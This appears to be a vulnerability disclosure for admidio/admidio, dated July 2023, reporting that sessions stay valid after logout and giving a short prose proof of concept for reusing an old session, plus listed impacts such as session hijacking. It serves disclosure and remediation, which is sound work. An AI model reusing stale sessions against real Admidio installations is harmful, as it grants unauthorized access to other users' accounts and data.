Insufficient Session Expiration because of lacking of cache check in admidio/admidio
Jul 21st 2023
The web application's session management system suffers from an "Insufficient Session Expiration" vulnerability due to the lack of proper cache check. This vulnerability allows a user's session to remain valid even after the user has logged out, potentially granting unauthorized access to sensitive areas and functionalities.
Proof of Concept
Step 1. Log in to the application with a valid user account. Step 2. Access the application's sensitive areas or functionalities. Step 3. Log out of the application. Step 4. Log in again Step 4. Attempt to access the application using the same session before logging out Step 5. Observe that the old session remains active and accessible, allowing access without requiring re-authentication.
- Unauthorized Access: Attackers can exploit this flaw to gain unauthorized access to user accounts, sensitive information, and functionalities associated with active sessions.
- Session Hijacking: Malicious actors can use old or captured session IDs to impersonate legitimate users, leading to session hijacking and subsequent misuse of the user's privileges.
- Data Exposure: As old sessions remain active, sensitive user data and application resources are at risk of exposure to unauthorized individuals.
- Identity Theft: The vulnerability facilitates identity theft, enabling attackers to perform actions on behalf of legitimate users.